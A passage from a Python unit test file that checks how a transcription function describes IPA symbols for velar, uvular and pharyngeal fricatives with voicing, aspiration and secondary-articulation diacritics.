self.assertEqual(actual, expected)
def test_ɣ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ɣ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar fricative pulmonic egressive consonant
def test_ɣ_is_the_representation_of_the_voiced_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ")
self.assertEqual(actual, expected)
def test_x̬_is_the_representation_of_the_voiced_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬")
self.assertEqual(actual, expected)
# voiced labialized velar fricative pulmonic egressive consonant
def test_ɣʷ_is_the_representation_of_the_voiced_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʷ")
self.assertEqual(actual, expected)
def test_x̬ʷ_is_the_representation_of_the_voiced_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar fricative pulmonic egressive consonant
def test_ɣʲ_is_the_representation_of_the_voiced_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʲ")
self.assertEqual(actual, expected)
def test_x̬ʲ_is_the_representation_of_the_voiced_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized velar fricative pulmonic egressive consonant
def test_ɣˠ_is_the_representation_of_the_voiced_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣˠ")
self.assertEqual(actual, expected)
def test_x̬ˠ_is_the_representation_of_the_voiced_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar fricative pulmonic egressive consonant
def test_ɣˤ_is_the_representation_of_the_voiced_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣˤ")
self.assertEqual(actual, expected)
def test_x̬ˤ_is_the_representation_of_the_voiced_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar fricative pulmonic egressive consonant
def test_ɣʰ_is_the_representation_of_the_voiced_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰ")
self.assertEqual(actual, expected)
def test_x̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar fricative pulmonic egressive consonant
def test_ɣʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰʷ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰʷ")
self.assertEqual(actual, expected)
def test_x̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar fricative pulmonic egressive consonant
def test_ɣʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰʲ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰʲ")
self.assertEqual(actual, expected)
def test_x̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar fricative pulmonic egressive consonant
def test_ɣʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰˠ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰˠ")
self.assertEqual(actual, expected)
def test_x̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar fricative pulmonic egressive consonant
def test_ɣʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣʰˤ")
self.assertEqual(actual, expected)
def test_ɣ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("ɣ̬ʰˤ")
self.assertEqual(actual, expected)
def test_x̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar fricative pulmonic egressive consonant"
actual = describe_transcription("x̬ʰˤ")
self.assertEqual(actual, expected)
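# The voiceless variants above are written with combining diacritics (ring
# below U+0325, or ring above U+030A for symbols with descenders) rather than
# precomposed characters, so each input is a multi-codepoint string. A small
# self-contained check (a sketch; it assumes only the standard unicodedata
# module) makes that encoding explicit:
def test_voiceless_diacritic_is_a_combining_codepoint(self):
    import unicodedata
    ring_below = "x\u0325"  # the same sequence as the "x̥" literals above
    self.assertEqual(len(ring_below), 2)  # base letter plus combining mark
    self.assertEqual(unicodedata.name(ring_below[1]), "COMBINING RING BELOW")
    # No precomposed form exists, so NFC normalization leaves it unchanged.
    self.assertEqual(unicodedata.normalize("NFC", ring_below), ring_below)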
# voiceless uvular fricative pulmonic egressive consonant
def test_χ_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ")
self.assertEqual(actual, expected)
def test_χ̊_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊")
self.assertEqual(actual, expected)
def test_χ̥_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥")
self.assertEqual(actual, expected)
def test_ʁ̊_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊")
self.assertEqual(actual, expected)
def test_ʁ̥_is_the_representation_of_the_voiceless_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥")
self.assertEqual(actual, expected)
# voiceless labialized uvular fricative pulmonic egressive consonant
def test_χʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʷ")
self.assertEqual(actual, expected)
def test_χ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ʷ")
self.assertEqual(actual, expected)
def test_χ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ʷ")
self.assertEqual(actual, expected)
def test_ʁ̊ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʷ")
self.assertEqual(actual, expected)
def test_ʁ̥ʷ_is_the_representation_of_the_voiceless_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized uvular fricative pulmonic egressive consonant
def test_χʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʲ")
self.assertEqual(actual, expected)
def test_χ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ʲ")
self.assertEqual(actual, expected)
def test_χ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ʲ")
self.assertEqual(actual, expected)
def test_ʁ̊ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʲ")
self.assertEqual(actual, expected)
def test_ʁ̥ʲ_is_the_representation_of_the_voiceless_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized uvular fricative pulmonic egressive consonant
def test_χˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χˠ")
self.assertEqual(actual, expected)
def test_χ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ˠ")
self.assertEqual(actual, expected)
def test_χ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ˠ")
self.assertEqual(actual, expected)
def test_ʁ̊ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ˠ")
self.assertEqual(actual, expected)
def test_ʁ̥ˠ_is_the_representation_of_the_voiceless_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized uvular fricative pulmonic egressive consonant
def test_χˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χˤ")
self.assertEqual(actual, expected)
def test_χ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̊ˤ")
self.assertEqual(actual, expected)
def test_χ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̥ˤ")
self.assertEqual(actual, expected)
def test_ʁ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ˤ")
self.assertEqual(actual, expected)
def test_ʁ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated uvular fricative pulmonic egressive consonant
def test_χʰ_is_the_representation_of_the_voiceless_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰ_is_the_representation_of_the_voiceless_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized uvular fricative pulmonic egressive consonant
def test_χʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰʷ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized uvular fricative pulmonic egressive consonant
def test_χʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰʲ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized uvular fricative pulmonic egressive consonant
def test_χʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰˠ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant
def test_χʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χʰˤ")
self.assertEqual(actual, expected)
def test_ʁ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʁ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced uvular fricative pulmonic egressive consonant
def test_ʁ_is_the_representation_of_the_voiced_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ")
self.assertEqual(actual, expected)
def test_χ̬_is_the_representation_of_the_voiced_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬")
self.assertEqual(actual, expected)
# voiced labialized uvular fricative pulmonic egressive consonant
def test_ʁʷ_is_the_representation_of_the_voiced_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʷ")
self.assertEqual(actual, expected)
def test_χ̬ʷ_is_the_representation_of_the_voiced_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized uvular fricative pulmonic egressive consonant
def test_ʁʲ_is_the_representation_of_the_voiced_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʲ")
self.assertEqual(actual, expected)
def test_χ̬ʲ_is_the_representation_of_the_voiced_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized uvular fricative pulmonic egressive consonant
def test_ʁˠ_is_the_representation_of_the_voiced_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁˠ")
self.assertEqual(actual, expected)
def test_χ̬ˠ_is_the_representation_of_the_voiced_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized uvular fricative pulmonic egressive consonant
def test_ʁˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁˤ")
self.assertEqual(actual, expected)
def test_χ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated uvular fricative pulmonic egressive consonant
def test_ʁʰ_is_the_representation_of_the_voiced_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰ")
self.assertEqual(actual, expected)
def test_χ̬ʰ_is_the_representation_of_the_voiced_aspirated_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized uvular fricative pulmonic egressive consonant
def test_ʁʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰʷ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰʷ")
self.assertEqual(actual, expected)
def test_χ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized uvular fricative pulmonic egressive consonant
def test_ʁʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰʲ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰʲ")
self.assertEqual(actual, expected)
def test_χ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized uvular fricative pulmonic egressive consonant
def test_ʁʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰˠ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰˠ")
self.assertEqual(actual, expected)
def test_χ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant
def test_ʁʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁʰˤ")
self.assertEqual(actual, expected)
def test_ʁ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("ʁ̬ʰˤ")
self.assertEqual(actual, expected)
def test_χ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_uvular_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"
actual = describe_transcription("χ̬ʰˤ")
self.assertEqual(actual, expected)
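# NOTE: hedged sketch, not part of the original suite. The hand-enumerated
# methods above can also be written table-driven with unittest's subTest,
# which reports each transcription separately and cannot silently shadow a
# test the way duplicate method names do. These cases only repeat
# assertions already made above.
def test_uvular_fricative_descriptions_table_driven(self):
    cases = [
        ("ʁʰ", "voiced aspirated uvular fricative pulmonic egressive consonant"),
        ("ʁʰʷ", "voiced aspirated labialized uvular fricative pulmonic egressive consonant"),
        ("χ̬ʰˤ", "voiced aspirated pharyngealized uvular fricative pulmonic egressive consonant"),
    ]
    for transcription, description in cases:
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), description)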
# voiceless pharyngeal fricative pulmonic egressive consonant
def test_ħ_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ")
self.assertEqual(actual, expected)
def test_ħ̊_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊")
self.assertEqual(actual, expected)
def test_ħ̥_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥")
self.assertEqual(actual, expected)
def test_ʕ̊_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊")
self.assertEqual(actual, expected)
def test_ʕ̥_is_the_representation_of_the_voiceless_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥")
self.assertEqual(actual, expected)
# voiceless labialized pharyngeal fricative pulmonic egressive consonant
def test_ħʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʷ")
self.assertEqual(actual, expected)
def test_ħ̊ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ʷ")
self.assertEqual(actual, expected)
def test_ħ̥ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ʷ")
self.assertEqual(actual, expected)
def test_ʕ̊ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʷ")
self.assertEqual(actual, expected)
def test_ʕ̥ʷ_is_the_representation_of_the_voiceless_labialized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized pharyngeal fricative pulmonic egressive consonant
def test_ħʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħʲ")
self.assertEqual(actual, expected)
def test_ħ̊ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̊ʲ")
self.assertEqual(actual, expected)
def test_ħ̥ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ħ̥ʲ")
self.assertEqual(actual, expected)
def test_ʕ̊ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̊ʲ")
self.assertEqual(actual, expected)
def test_ʕ̥ʲ_is_the_representation_of_the_voiceless_palatalized_pharyngeal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized pharyngeal fricative pulmonic egressive consonant"
actual = describe_transcription("ʕ̥ʲ")
self.assertEqual(actual, expected)
